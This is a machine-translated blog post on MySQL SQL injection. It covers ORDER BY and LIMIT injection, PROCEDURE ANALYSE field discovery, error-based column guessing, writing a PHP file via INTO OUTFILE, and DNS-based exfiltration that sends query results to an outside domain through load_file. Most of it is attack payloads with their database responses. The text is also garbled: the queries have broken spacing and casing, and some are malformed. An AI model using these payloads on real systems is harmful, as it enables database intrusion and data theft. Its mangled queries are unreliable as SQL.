Some skills in Mysql alternative blind Injection

I learned a lot of skills from paper outside China, but not many people in China use them ~ I. orderby parameter injection tips: both methods have the same idea. Example. selectusername, passwordfromuc_membersorderby. $ _ GET [oderby] a. Common usage methods: 1. [SQL] selectuser

From: http://www.oldjun.com/blog/indEx.Php/Archives/62/

I learned a lot of skills from paper outside China, but not many people in China use them ~

I. order by parameter injection tips:
Both methods have the same idea.

Example. "select username, password from uc_members order by". $ _ GET ['oberde']

A. Common usage methods:
1. [SQL] select username, password from uc_members order by 1, If (select 1) = 2, 1, (select value from uc _Set));
Returned error: [Err] 1242-Subquery returnsMoreThan 1 row
2. [SQL] select username, password from uc_members order by 1, If (select 1) = 1, 1, (select value from uc_settings ));
Returns normal.

B. Methods seen by paper outside China:
1. [SQL] select username, password from uc_members order by 1, (select case when (2 <1) then 1 eLsE 1 * (select username from uc_members) end) = 1;
Returned error: [Err] 1242-Subquery returns more than 1 row
2. [SQL] select username, password from uc_members order by 1, (select case when (2> 1) then 1 else 1 * (select username from uc_members) end) = 1;
Returns normal.

Ii. limit parameter injection tips:

A. The limit parameter injection after order by, because the normal SQL statement order by cannot be followed by union, so there is no good way to solve this problem. The idea is as follows: into out.File'/Www/root/xxx. php ';

B. If there is no order by injection before limit, it is much more convenient. You can directly connect to the union select statement next to it. You can just add it as you like:
Select * fromCdB _members limit 1 union select, 5, 6, 7, 8, 9, 10, 1, 2, 3, 4, 5, 6, 7
Here is another tip: Use procEdUre analyze can get the field name:
Select * from cdb_members where uId= 1 limit 1, 1 proceDuRe analyze ()
However, procedure analyze cannot be used after order:
[SQL] select * from cdb_members order by uid desc limit 1 procedure analyze ()
[Err] 1386-Can't use ORDER clause with this procedure

3. Tips When fields cannot be guessed:

Versions earlier than MySQL 5 or infoRmWhen the ation_schema cannot be accessed, you cannot guess the field name of a table. Therefore, you can use % 0 in the subquery and report an error to get the column name. Take uc_members of ucenter as an example.

1. Number of rows to be guessed: SELECT 1 FROM 'uc _ members 'where (SELECT * FROM 'uc _ members') = (1)
Returned error: #1241-Operand shoshould contain 12ColUmn (s)
2. SELECT 1 FROM 'uc _ members 'where (,) = (SELECT * FROM 'uc _ members' union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 limit 1)
Returns normal.
3. SELECT 1 FROM 'uc _ members 'where (1%,) = (SELECT * FROM 'uc _ members' union select, 5, 6, 7, 8, 9, 10, 11, 12 limit 1)
Returned error: #1048-Column 'uid' cannot be null
4. SELECT 1 FROM 'uc _ members 'where (,) = (SELECT * FROM 'uc _ members' union select, 6, 7, 8, 9, 10, 11, 12 limit 1)
Returned error: #1048-Column 'username' cannot be null
5 .......

Note: Version 5.1 and later are not applicable. The field must be non-null (not null)

4. Blind dns resolution injection in windows:

If the blind injection is very tired, or the page returns the same results regardless of and 1 = 1 or and 1 = 2, using dns for injection is a good method, the premise is that mysql under the root permission of the win environment uses the load_file function to read remote files. Build a local dns server and then forward the NS server of a specific domain name. Then inject andPacket Capture.

Tested locally (single quotes can be encoded in actual injection): select load_file (coNcAt ('aaa1. ', (select user({},'.oldjun.coma.txt'), the select result is obtained successfully after packet capture:
29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com

: